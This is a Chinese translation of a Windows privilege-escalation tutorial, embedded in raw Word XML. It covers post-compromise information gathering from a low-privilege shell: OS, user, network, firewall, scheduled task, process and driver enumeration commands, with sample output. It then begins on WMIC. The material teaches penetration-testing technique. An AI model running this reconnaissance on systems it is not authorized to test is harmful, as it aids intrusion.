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本篇教程是笔者翻译国外</w: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"http://www.fuzzysecurity.com/tutorials/16.html" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/_blank"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t>大牛fuzzysecurity 的文章</w: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再加上个人的理解写出的关于Windows 提权基础的文章，其中有些地方因为不太实用所以做了适当修改，感谢@hl0rey 的帮助和建议。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"Indispensable-Resources" \o "Indispensable Resources:"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Indispensable Resources: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" w:beforeAutospacing="0" w:after="21" w:afterAutospacing="0"/>
        <w:ind w:left="22" w:right="21" w:hanging="360"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia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Encyclopaedia Of Windows Privilege Escalation (Brett Moore) -</w:t>
      </w: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"https://www.youtube.com/watch?v=kMG8IsCohHA" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/_blank" </w:instrText>
      </w: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t>here</w:t>
      </w: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" w:beforeAutospacing="0" w:after="21" w:afterAutospacing="0"/>
        <w:ind w:left="22" w:right="21" w:hanging="360"/>
        <w:textAlignment w:val="baseline"/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Windows Attacks: AT is the new black (Chris Gates &amp; Rob Fuller) -</w:t>
      </w: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"https://www.youtube.com/watch?v=_8xJaaQlpBo" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/_blank" </w:instrText>
      </w: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t>here</w:t>
      </w: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" w:beforeAutospacing="0" w:after="21" w:afterAutospacing="0"/>
        <w:ind w:left="22" w:right="21" w:hanging="360"/>
        <w:textAlignment w:val="baseline"/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Elevating privileges by exploiting weak folder permissions (Parvez Anwar) -</w:t>
      </w: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"http://www.greyhathacker.net/?p=738" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/_blank" </w:instrText>
      </w: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t>here</w:t>
      </w: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105" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0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"%CE%94t-for-t0-to-t3-Initial-Information-Gathering" \o "Δt for t0 to t3 - Initial Information Gathering"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66BE66"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Δt for t0 to t3 - Initial Information Gathering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8%BF%99%E4%B8%AA%E6%95%99%E7%A8%8B%E4%BB%8EWindows-%E7%9A%84%E4%BD%8E%E6%9D%83%E9%99%90shell-%E5%BC%80%E5%A7%8B%E8%AE%B2%E8%BF%B0%E5%A6%82%E4%BD%95%E6%8F%90%E6%9D%83%E3%80%82%E6%88%91%E4%BB%AC%E5%8F%AF%E8%83%BD%E5%88%A9%E7%94%A8%E6%9F%90%E4%B8%AAEXP-%E6%88%96%E8%80%85%E4%BB%8E%E5%AE%A2%E6%88%B7%E7%AB%AF%E6%94%BB%E5%87%BB%E5%8F%96%E5%BE%97%E4%BA%86%E4%B8%80%E4%B8%AA%E5%8F%8D%E5%BC%B9shell-%E3%80%82%E6%9C%80%E5%BC%80%E5%A7%8B%E6%88%91%E4%BB%AC%E8%BF%98%E4%B8%8D%E4%BA%86%E8%A7%A3%E8%BF%99%E5%8F%B0%E8%AE%A1%E7%AE%97%E6%9C%BA%EF%BC%8C%E4%B8%8D%E7%9F%A5%E9%81%93%E5%AE%83%E6%98%AF%E5%B9%B2%E4%BB%80%E4%B9%88%E7%94%A8%E7%9A%84%EF%BC%8C%E8%BF%9E%E6%8E%A5%E5%88%B0%E5%93%AA%E9%87%8C%EF%BC%8C%E6%9C%89%E4%BB%80%E4%B9%88%E7%AD%89%E7%BA%A7%E7%9A%84%E6%9D%83%E9%99%90%E6%88%96%E8%80%85%E7%94%9A%E8%87%B3%E4%B8%8D%E7%9F%A5%E9%81%93%E5%AE%83%E6%98%AF%E4%BB%80%E4%B9%88%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E3%80%82" \o "这个教程从Windows 的低权限shell 开始讲述如何提权。我们可能利用某个EXP 或者从客户端攻击取得了一个反弹shell 。最开始我们还不了解这台计算机，不知道它是干什么用的，连接到哪里，有什么等级的权限或者甚至不知道它是什么操作系统。"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这个教程从Windows 的低权限shell 开始讲述如何提权。我们可能利用某个EXP 或者从客户端攻击取得了一个反弹shell 。最开始我们还不了解这台计算机，不知道它是干什么用的，连接到哪里，有什么等级的权限或者甚至不知道它是什么操作系统。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6%9C%80%E5%88%9D%E6%88%91%E4%BB%AC%E5%B8%8C%E6%9C%9B%E5%BF%AB%E9%80%9F%E7%9A%84%E6%94%B6%E9%9B%86%E4%B8%80%E4%BA%9B%E9%87%8D%E8%A6%81%E7%9A%84%E4%BF%A1%E6%81%AF%EF%BC%8C%E4%BB%A5%E4%BE%BF%E6%88%91%E4%BB%AC%E8%83%BD%E5%A4%9F%E8%AF%84%E4%BC%B0%E6%88%91%E4%BB%AC%E6%89%80%E5%A4%84%E7%9A%84%E7%8A%B6%E5%86%B5%EF%BC%8C%E5%B9%B6%E4%BD%9C%E5%87%BA%E6%AD%A3%E7%A1%AE%E7%9A%84%E5%88%A4%E6%96%AD%EF%BC%81" \o "最初我们希望快速的收集一些重要的信息，以便我们能够评估我们所处的状况，并作出正确的判断！"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最初我们希望快速的收集一些重要的信息，以便我们能够评估我们所处的状况，并作出正确的判断！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"%E9%A6%96%E5%85%88%E6%9F%A5%E7%9C%8B%E8%BF%9E%E6%8E%A5%E7%9A%84%E6%98%AF%E4%BB%80%E4%B9%88%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%EF%BC%9A" \o "首先查看连接的是什么操作系统："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首先查看连接的是什么操作系统：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"/>
        <w:gridCol w:w="8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//英文系统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//C:\Windows\system32&gt; systeminfo | findstr /B /C:"OS Name" /C:"OS Version"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//中文系统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systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"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OS 名称:                   Microsoft Windows 7 家庭普通版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OS 版本:                6.1.7601 Service Pack 1 Build 7601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"%E6%8E%A5%E4%B8%8B%E6%9D%A5%E6%9F%A5%E7%9C%8B%E4%B8%BB%E6%9C%BA%E5%90%8D%E5%92%8C%E5%BD%93%E5%89%8Dshell-%E7%9A%84%E7%94%A8%E6%88%B7%E5%90%8D%EF%BC%9A" \o "接下来查看主机名和当前shell 的用户名："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接下来查看主机名和当前shell 的用户名：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5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"/>
        <w:gridCol w:w="5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hostname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b33f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echo %username%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user1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7%8E%B0%E5%9C%A8%E6%88%91%E4%BB%AC%E5%B7%B2%E7%BB%8F%E6%9C%89%E4%BA%86%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF%EF%BC%8C%E8%AE%A9%E6%88%91%E4%BB%AC%E7%BB%A7%E7%BB%AD%E5%88%97%E5%87%BA%E5%85%B6%E4%BB%96%E7%9A%84%E7%94%A8%E6%88%B7%E8%B4%A6%E5%8F%B7%E5%90%8D%E5%B9%B6%E6%9F%A5%E7%9C%8B%E6%88%91%E4%BB%AC%E8%87%AA%E5%B7%B1%E6%9B%B4%E8%AF%A6%E7%BB%86%E7%9A%84%E4%BF%A1%E6%81%AF%E3%80%82%E8%83%BD%E5%A4%9F%E7%9C%8B%E5%88%B0%E6%88%91%E4%BB%AC%E7%9A%84%E8%B4%A6%E5%8F%B7user1-%E4%B8%8D%E5%9C%A8localgroup-Administrators-%E4%B8%AD%EF%BC%8C%E4%B8%8D%E6%98%AF%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%8F%B7%E3%80%82" \o "现在我们已经有了基本信息，让我们继续列出其他的用户账号名并查看我们自己更详细的信息。能够看到我们的账号user1 不在localgroup Administrators 中，不是管理员账号。"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现在我们已经有了基本信息，让我们继续列出其他的用户账号名并查看我们自己更详细的信息。能够看到我们的账号user1 不在localgroup Administrators 中，不是管理员账号。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"/>
        <w:gridCol w:w="8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36</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813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net users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User accounts for \\B33F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-------------------------------------------------------------------------------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Administrator            b33f                     Guest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user1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The command completed successfully.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net user user1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User name                    user1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Full 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Comment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User's comment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Country code                 000 (System Default)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Account active               Yes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Account expires              Never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Password last set            1/11/2014 7:47:14 PM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Password expires             Never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Password changeable          1/11/2014 7:47:14 PM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Password required            Yes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User may change password     Yes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Workstations allowed         All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Logon script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User profile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Home directory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Last logon                   1/11/2014 8:05:09 PM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Logon hours allowed          All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Local Group Memberships      *Users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Global Group memberships     *None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The command completed successfully.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4%BB%A5%E4%B8%8A%E5%B0%B1%E6%98%AF%E6%88%91%E4%BB%AC%E7%9B%AE%E5%89%8D%E9%9C%80%E8%A6%81%E4%BA%86%E8%A7%A3%E7%9A%84%E7%94%A8%E6%88%B7%E5%92%8C%E6%9D%83%E9%99%90%E4%BF%A1%E6%81%AF%E3%80%82%E6%8E%A5%E4%B8%8B%E6%9D%A5%E6%88%91%E4%BB%AC%E6%9F%A5%E7%9C%8B%E7%BD%91%E7%BB%9C%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E3%80%82" \o "以上就是我们目前需要了解的用户和权限信息。接下来我们查看网络配置信息。"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以上就是我们目前需要了解的用户和权限信息。接下来我们查看网络配置信息。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"%E9%A6%96%E5%85%88%E6%88%91%E4%BB%AC%E6%9F%A5%E7%9C%8B%E5%8F%AF%E7%94%A8%E7%9A%84%E7%BD%91%E5%8D%A1%E5%92%8C%E8%B7%AF%E7%94%B1%E8%A1%A8" \o "首先我们查看可用的网卡和路由表"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首先我们查看可用的网卡和路由表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"/>
        <w:gridCol w:w="80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107</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="803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ipconfig /all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Windows IP Configuration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Host Name . . . . . . . . . . . . : b33f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Primary Dns Suffix  . . . . . . . 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Node Type . . . . . . . . . . . . : Hybrid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IP Routing Enabled. . . . . . . . : No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WINS Proxy Enabled. . . . . . . . : No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Ethernet adapter Bluetooth Network Connection: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Media State . . . . . . . . . . . : Media disconnected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Connection-specific DNS Suffix  . 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Description . . . . . . . . . . . : Bluetooth Device (Personal Area Network)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Physical Address. . . . . . . . . : 0C-84-DC-62-60-29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DHCP Enabled. . . . . . . . . . . : Yes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Autoconfiguration Enabled . . . . : Yes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Ethernet adapter Local Area Connection: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Connection-specific DNS Suffix  . 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Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection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Physical Address. . . . . . . . . : 00-0C-29-56-79-35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DHCP Enabled. . . . . . . . . . . : Yes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Autoconfiguration Enabled . . . . : Yes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Link-local IPv6 Address . . . . . : fe80::5cd4:9caf:61c0:ba6e%11(Preferred)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IPv4 Address. . . . . . . . . . . : 192.168.0.104(Preferred)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Subnet Mask . . . . . . . . . . . : 255.255.255.0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Lease Obtained. . . . . . . . . . : Saturday, January 11, 2014 3:53:55 PM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Lease Expires . . . . . . . . . . : Sunday, January 12, 2014 3:53:55 PM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Default Gateway . . . . . . . . . : 192.168.0.1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DHCP Server . . . . . . . . . . . : 192.168.0.1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DHCPv6 IAID . . . . . . . . . . . : 234884137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DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-18-14-24-1D-00-0C-29-56-79-35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DNS Servers . . . . . . . . . . . : 192.168.0.1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NetBIOS over Tcpip. . . . . . . . : Enabled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route print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===========================================================================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Interface List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18...0c 84 dc 62 60 29 ......Bluetooth Device (Personal Area Network)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13...00 ff 0c 0d 4f ed ......TAP-Windows Adapter V9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11...00 0c 29 56 79 35 ......Intel(R) PRO/1000 MT Network Connection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1...........................Software Loopback Interface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16...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter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15...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2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19...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #3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14...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface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===========================================================================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IPv4 Route Table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===========================================================================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Active Routes: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Network Destination        Netmask          Gateway       Interface  Metric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  0.0.0.0          0.0.0.0      192.168.0.1    192.168.0.104     10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127.0.0.0        255.0.0.0         On-link         127.0.0.1    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127.0.0.1  255.255.255.255         On-link         127.0.0.1    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127.255.255.255  255.255.255.255         On-link         127.0.0.1    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192.168.0.0    255.255.255.0         On-link     192.168.0.104    266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192.168.0.104  255.255.255.255         On-link     192.168.0.104    266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192.168.0.255  255.255.255.255         On-link     192.168.0.104    266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224.0.0.0        240.0.0.0         On-link         127.0.0.1    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224.0.0.0        240.0.0.0         On-link     192.168.0.104    266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255.255.255.255  255.255.255.255         On-link         127.0.0.1    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255.255.255.255  255.255.255.255         On-link     192.168.0.104    266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===========================================================================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Persistent Routes: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None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IPv6 Route Table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===========================================================================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Active Routes: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If Metric Network Destination      Gateway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14     58 ::/0                     On-link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1    306 ::1/128                  On-link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14     58 2001::/32                On-link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14    306 2001:0:5ef5:79fb:8d2:b4e:3f57:ff97/128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                            On-link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11    266 fe80::/64                On-link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14    306 fe80::/64                On-link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14    306 fe80::8d2:b4e:3f57:ff97/128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                            On-link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11    266 fe80::5cd4:9caf:61c0:ba6e/128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                            On-link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1    306 ff00::/8                 On-link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14    306 ff00::/8                 On-link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11    266 ff00::/8                 On-link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===========================================================================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Persistent Routes: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None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# arp -A displays the ARP (Address Resolution Protocol) cache table for all available interfaces.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arp -A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Interface: 192.168.0.104 --- 0xb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Internet Address      Physical Address      Type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192.168.0.1           90-94-e4-c5-b0-46     dynamic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192.168.0.101         ac-22-0b-af-bb-43     dynamic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192.168.0.255         ff-ff-ff-ff-ff-ff     static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224.0.0.22            01-00-5e-00-00-16     static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224.0.0.251           01-00-5e-00-00-fb     static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224.0.0.252           01-00-5e-00-00-fc     static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239.255.255.250       01-00-5e-7f-ff-fa     static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255.255.255.255       ff-ff-ff-ff-ff-ff     static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"%E4%B8%8B%E9%9D%A2%E4%BD%BF%E7%94%A8netstat-%E5%91%BD%E4%BB%A4%E6%9F%A5%E7%9C%8B%E4%B8%BB%E6%9C%BA%E7%9A%84%E7%BD%91%E7%BB%9C%E8%BF%9E%E6%8E%A5%E5%92%8C%E9%98%B2%E7%81%AB%E5%A2%99%E8%A7%84%E5%88%99" \o "下面使用netstat 命令查看主机的网络连接和防火墙规则"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下面使用netstat 命令查看主机的网络连接和防火墙规则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"/>
        <w:gridCol w:w="8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110</w:t>
            </w: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netstat -ano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Active Connections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Proto  Local Address          Foreign Address        State           PID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TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       684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TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       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TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       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TCP    127.0.0.1:5354         0.0.0.0:0              LISTENING       1400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TCP    192.168.0.104:139      0.0.0.0:0              LISTENING       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TCP    [::]:135               [::]:0                 LISTENING       684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TCP    [::]:445               [::]:0                 LISTENING       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TCP    [::]:5357              [::]:0                 LISTENING       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0.0.0.0:5355           *:*                                    1100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0.0.0.0:52282          *:*                                    976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0.0.0.0:55202          *:*                                    2956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0.0.0.0:59797          *:*                                    1400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127.0.0.1:1900         *:*                                    2956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127.0.0.1:65435        *:*                                    2956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192.168.0.104:137      *:*                                    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192.168.0.104:138      *:*                                    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192.168.0.104:1900     *:*                                    2956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192.168.0.104:5353     *:*                                    1400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192.168.0.104:65434    *:*                                    2956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[::]:5355              *:*                                    1100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[::]:52281             *:*                                    976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[::]:52283             *:*                                    976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[::]:55203             *:*                                    2956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[::]:59798             *:*                                    1400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[::1]:1900             *:*                                    2956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[::1]:5353             *:*                                    1400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[::1]:65433            *:*                                    2956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[fe80::5cd4:9caf:61c0:ba6e%11]:1900  *:*                      2956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UDP    [fe80::5cd4:9caf:61c0:ba6e%11]:65432  *:*                     2956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# The following two netsh commands are examples of commands that are not universal across OS/SP. The netsh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firewall commands are only available from XP SP2 and upwards.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netsh firewall show state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Firewall status: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Profile                           = Standard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Operational mode                  = Enable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Exception mode                    = Enable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Multicast/broadcast response mode = Enable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Notification mode                 = Enable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Group policy version              = Windows Firewall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Remote admin mode                 = Disable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Ports currently open on all network interfaces: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Port   Protocol  Version  Program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No ports are currently open on all network interfaces.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netsh firewall show config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Domain profile configuration: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Operational mode                  = Enable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Exception mode                    = Enable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Multicast/broadcast response mode = Enable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Notification mode                 = Enable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Allowed programs configuration for Domain profile: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Mode     Traffic direction    Name / Program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Port configuration for Domain profile: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Port   Protocol  Mode    Traffic direction     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ICMP configuration for Domain profile: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Mode     Type  Description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Enable   2     Allow outbound packet too big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Standard profile configuration (current):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Operational mode                  = Enable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Exception mode                    = Enable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Multicast/broadcast response mode = Enable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Notification mode                 = Enable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Service configuration for Standard profile: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Mode     Customized  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Enable   No          Network Discovery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Allowed programs configuration for Standard profile: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Mode     Traffic direction    Name / Program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Enable   Inbound              COMRaider / E:\comraider\comraider.exe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Enable   Inbound              nc.exe / C:\users\b33f\desktop\nc.exe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Port configuration for Standard profile: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Port   Protocol  Mode    Traffic direction     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ICMP configuration for Standard profile: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Mode     Type  Description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Enable   2     Allow outbound packet too big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Log configuration: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File location   = C:\Windows\system32\LogFiles\Firewall\pfirewall.log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Max file size   = 4096 KB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Dropped packets = Disable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Connections     = Disable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6%9C%80%E5%90%8E%E6%88%91%E4%BB%AC%E7%AE%80%E5%8D%95%E7%9A%84%E7%9C%8B%E7%9C%8B%E4%B8%BB%E6%9C%BA%E8%BF%90%E8%A1%8C%E7%9A%84%E5%86%85%E5%AE%B9%EF%BC%9A%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E3%80%81%E6%AD%A3%E5%9C%A8%E8%BF%90%E8%A1%8C%E7%9A%84%E8%BF%9B%E7%A8%8B%E3%80%81%E5%B7%B2%E7%BB%8F%E5%90%AF%E5%8A%A8%E7%9A%84%E6%9C%8D%E5%8A%A1%E5%92%8C%E5%B7%B2%E7%BB%8F%E5%AE%89%E8%A3%85%E7%9A%84%E9%A9%B1%E5%8A%A8" \o "最后我们简单的看看主机运行的内容：计划任务、正在运行的进程、已经启动的服务和已经安装的驱动"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最后我们简单的看看主机运行的内容：计划任务、正在运行的进程、已经启动的服务和已经安装的驱动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"/>
        <w:gridCol w:w="79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135</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="792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# This will display verbose output for all scheduled tasks, below you can see sample output for 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single task.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schtasks /query /fo LIST /v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Folder: \Microsoft\Windows Defender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HostName:                             B33F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TaskName:                             \Microsoft\Windows Defender\MP Scheduled Scan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Next Run Time:                        1/22/2014 5:11:13 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Status:                               Ready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Logon Mode:                           Interactive/Background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Last Run Time:                       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Last Result:                         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Author:                              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Task To Run:                          c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob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                              -WinTask -RestrictPrivilegesScan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Start In:                            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Comment:                              Scheduled Scan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Scheduled Task State:                 Enabled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Idle Time:                            Only Start If Idle for 1 minutes, If Not Idle Retry For 240 minutes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Power Management:                     No Start On Batteries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Run As User:                          SYSTEM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Delete Task If Not Rescheduled:       Enabled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Stop Task If Runs X Hours and X Mins: 72:00:00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Schedule:                             Scheduling data is not available in this format.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Schedule Type:                        Daily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Start Time:                           5:11:13 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Start Date:                           1/1/2000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End Date:                             1/1/2100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Days:                                 Every 1 day(s)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Months:                              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Repeat: Every:                        Disabled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Repeat: Until: Time:                  Disabled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Repeat: Until: Duration:              Disabled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Repeat: Stop If Still Running:        Disabled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[..Snip..]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# The following command links running processes to started services.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tasklist /SVC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Image Name                     PID Services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========================= ======== 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System Idle Process              0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System                           4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smss.exe                       244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csrss.exe                      332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csrss.exe                      372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wininit.exe                    380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winlogon.exe                   428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services.exe                   476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lsass.exe                      484 SamSs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lsm.exe                        496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svchost.exe                    588 DcomLaunch, PlugPlay, Power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svchost.exe                    668 RpcEptMapper, RpcSs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svchost.exe                    760 Audiosrv, Dhcp, eventlog,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                           HomeGroupProvider, lmhosts, wscsvc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svchost.exe                    800 AudioEndpointBuilder, CscService, Netman,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                           SysMain, TrkWks, UxSms, WdiSystemHost,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                           wudfsvc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svchost.exe                    836 AeLookupSvc, BITS, gpsvc, iphlpsvc,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                           LanmanServer, MMCSS, ProfSvc, Schedule,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                           seclogon, SENS, ShellHWDetection, Themes,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                           Winmgmt, wuauserv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audiodg.exe                    916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svchost.exe                    992 EventSystem, fdPHost, netprofm, nsi,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                           WdiServiceHost, WinHttpAutoProxySvc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svchost.exe                   1104 CryptSvc, Dnscache, LanmanWorkstation,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                           NlaSvc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spoolsv.exe                   1244 Spooler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svchost.exe                   1272 BFE, DPS, MpsSvc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mDNSResponder.exe             1400 Bonjour Service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taskhost.exe                  1504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taskeng.exe                   1556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vmtoolsd.exe                  1580 VMTools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dwm.exe                       1660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explorer.exe                  1668 N/A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vmware-usbarbitrator.exe      1768 VMUSBArbService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TPAutoConnSvc.exe             1712 TPAutoConnSvc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[..Snip..]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net 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These Windows services are started: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Application Experience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Application Information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Background Intelligent Transfer Service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Base Filtering Engine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Bluetooth Support Service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Bonjour Service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COM+ Event System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COM+ System Application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Cryptographic Services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DCOM Server Process Launcher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Desktop Window Manager Session Manager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DHCP Client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Diagnostic Policy Service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Diagnostic Service Host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Diagnostic System Host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Distributed Link Tracking Client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Distributed Transaction Coordinator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DNS Client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Function Discovery Provider Host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Function Discovery Resource Publication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Group Policy Client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[..Snip..]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# This can be useful sometimes as some 3rd party drivers, even by reputable companies, contain more holes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than Swiss cheese. This is only possible because ring0 exploitation lies outside most peoples expertise.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DRIVERQUERY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Module Name  Display Name           Driver Type   Link Date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============ ====================== ============= ======================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1394ohci     1394 OHCI Compliant Ho Kernel        11/20/2010 6:01:11 PM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ACPI         Microsoft ACPI Driver  Kernel        11/20/2010 4:37:52 PM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AcpiPmi      ACPI Power Meter Drive Kernel        11/20/2010 4:47:55 PM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adp94xx      adp94xx                Kernel        12/6/2008 7:59:55 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adpahci      adpahci                Kernel        5/2/2007 1:29:26 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adpu320      adpu320                Kernel        2/28/2007 8:03:08 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AFD          Ancillary Function Dri Kernel        11/20/2010 4:40:00 PM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agp440       Intel AGP Bus Filter   Kernel        7/14/2009 7:25:36 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aic78xx      aic78xx                Kernel        4/12/2006 8:20:11 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aliide       aliide                 Kernel        7/14/2009 7:11:17 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amdagp       AMD AGP Bus Filter Dri Kernel        7/14/2009 7:25:36 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amdide       amdide                 Kernel        7/14/2009 7:11:19 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AmdK8        AMD K8 Processor Drive Kernel        7/14/2009 7:11:03 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AmdPPM       AMD Processor Driver   Kernel        7/14/2009 7:11:03 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amdsata      amdsata                Kernel        3/19/2010 9:08:27 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amdsbs       amdsbs                 Kernel        3/21/2009 2:35:26 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amdxata      amdxata                Kernel        3/20/2010 12:19:01 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AppID        AppID Driver           Kernel        11/20/2010 5:29:48 PM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arc          arc                    Kernel        5/25/2007 5:31:06 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[..Snip..]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105" w:beforeAutospacing="0" w:after="105" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times" w:hAnsi="Times" w:eastAsia="Times" w:cs="Times"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="66BE66"/>
          <w:spacing w:val="0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"%CE%94t-for-t4-The-Arcane-Arts-Of-WMIC" \o "Δt for t4 - The Arcane Arts Of WMIC"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66BE66"/>
          <w:spacing w:val="0"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Δt for t4 - The Arcane Arts Of WMIC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6%88%91%E6%83%B3%E8%A6%81%E5%8D%95%E7%8B%AC%E6%8F%90%E5%8F%8A%E4%B8%80%E4%B8%8BWMIC-Windows-Management-Instrumentation-Command-Line-%EF%BC%8C%E5%9B%A0%E4%B8%BA%E5%AE%83%E6%98%AFWindows%E6%9C%80%E6%9C%89%E7%94%A8%E7%9A%84%E5%91%BD%E4%BB%A4%E8%A1%8C%E5%B7%A5%E5%85%B7%E3%80%82WMIC-%E5%AF%B9%E4%BA%8E%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86%E5%92%8C%E5%90%8E%E6%B8%97%E9%80%8F%E6%9D%A5%E8%AF%B4%E9%9D%9E%E5%B8%B8%E6%9C%89%E7%94%A8%E3%80%82%E4%B8%8D%E8%BF%87%E8%BF%99%E4%B8%AA%E5%B7%A5%E5%85%B7%E6%AF%94%E8%BE%83%E9%87%8D%E9%87%8F%E7%BA%A7%EF%BC%8C%E6%89%80%E4%BB%A5%E4%B8%8D%E4%BC%9A%E4%B8%80%E4%B8%80%E4%BB%8B%E7%BB%8D%E5%AE%83%E7%9A%84%E6%89%80%E6%9C%89%E5%8A%9F%E8%83%BD%E3%80%82" \o "我想要单独提及一下WMIC (Windows Management Instrumentation Command-Line) ，因为它是Windows最有用的命令行工具。WMIC 对于信息收集和后渗透来说非常有用。不过这个工具比较重量级，所以不会一一介绍它的所有功能。"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我想要单独提及一下WMIC (Windows Management Instrumentation Command-Line) ，因为它是Windows最有用的命令行工具。WMIC 对于信息收集和后渗透来说非常有用。不过这个工具比较重量级，所以不会一一介绍它的所有功能。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"%E4%B8%8B%E9%9D%A2%E9%93%BE%E6%8E%A5%E6%9C%89%E5%85%B3%E4%BA%8E%E5%AE%83%E7%9A%84%E8%AF%A6%E7%BB%86%E4%BD%BF%E7%94%A8%E6%95%99%E7%A8%8B%EF%BC%8C%E6%9C%89%E5%85%B4%E8%B6%A3%E7%9A%84%E5%8F%AF%E4%BB%A5%E5%8E%BB%E8%87%AA%E5%B7%B1%E7%BF%BB%E8%AF%91%E7%9C%8B%E7%9C%8B%EF%BC%9A" \o "下面链接有关于它的详细使用教程，有兴趣的可以去自己翻译看看："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下面链接有关于它的详细使用教程，有兴趣的可以去自己翻译看看：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" w:beforeAutospacing="0" w:after="21" w:afterAutospacing="0"/>
        <w:ind w:left="22" w:right="21" w:hanging="360"/>
        <w:textAlignment w:val="baseline"/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Windows WMIC Command Line (ComputerHope) - </w:t>
      </w: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"https://www.computerhope.com/wmic.htm" \t "https://times0ng.github.io/2018/04/13/Windows-%E6%8F%90%E6%9D%83%E5%9F%BA%E7%A1%80%EF%BC%88%E4%B8%8A%EF%BC%89/_blank" </w:instrText>
      </w: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t>here</w:t>
      </w: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4%BB%A4%E4%BA%BA%E9%81%97%E6%86%BE%E7%9A%84%E6%98%AF%E6%9C%89%E4%BA%9BWindows%E7%9A%84%E9%BB%98%E8%AE%A4%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%85%81%E8%AE%B8%E4%BD%BF%E7%94%A8WMIC%EF%BC%8C%E9%99%A4%E9%9D%9E%E7%94%A8%E6%88%B7%E6%98%AF%E5%9C%A8%E7%AE%A1%E7%90%86%E5%91%98%E7%BB%84%E9%87%8C%E9%9D%A2%E3%80%82%E4%BB%8E%E5%AF%B9VMIC-%E7%9A%84%E6%B5%8B%E8%AF%95%E4%B8%AD%E6%88%91%E6%B3%A8%E6%84%8F%E5%88%B0%E4%BB%BB%E4%BD%95%E7%89%88%E6%9C%AC%E7%9A%84XP-%E7%B3%BB%E7%BB%9F%E9%83%BD%E4%B8%8D%E5%85%81%E8%AE%B8%E4%BD%8E%E6%9D%83%E9%99%90%E8%B4%A6%E5%8F%B7%E4%BD%BF%E7%94%A8WMIC%E3%80%82%E7%9B%B8%E5%8F%8D%EF%BC%8C%E9%BB%98%E8%AE%A4%E5%AE%89%E8%A3%85%E7%9A%84Windows-7-Professional-%E5%92%8CWindows-8-%E4%BC%81%E4%B8%9A%E7%89%88%E5%8D%B4%E5%85%81%E8%AE%B8%E4%BD%BF%E7%94%A8%E4%BD%8E%E6%9D%83%E9%99%90%E8%B4%A6%E5%8F%B7%E4%BD%BF%E7%94%A8WMIC-%E6%9D%A5%E6%9F%A5%E8%AF%A2%E7%B3%BB%E7%BB%9F%E4%BF%A1%E6%81%AF%E8%80%8C%E4%B8%8D%E9%9C%80%E8%A6%81%E4%BF%AE%E6%94%B9%E4%BB%BB%E4%BD%95%E8%AE%BE%E7%BD%AE%E3%80%82%E6%83%8A%E4%B8%8D%E6%83%8A%E5%96%9C%EF%BC%8C%E6%84%8F%E4%B8%8D%E6%84%8F%E5%A4%96%EF%BC%9F" \o "令人遗憾的是有些Windows的默认配置不允许使用WMIC，除非用户是在管理员组里面。从对VMIC 的测试中我注意到任何版本的XP 系统都不允许低权限账号使用WMIC。相反，默认安装的Windows 7 Professional 和Windows 8 企业版却允许使用低权限账号使用WMIC 来查询系统信息而不需要修改任何设置。惊不惊喜，意不意外？"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令人遗憾的是有些Windows的默认配置不允许使用WMIC，除非用户是在管理员组里面。从对VMIC 的测试中我注意到任何版本的XP 系统都不允许低权限账号使用WMIC。相反，默认安装的Windows 7 Professional 和Windows 8 企业版却允许使用低权限账号使用WMIC 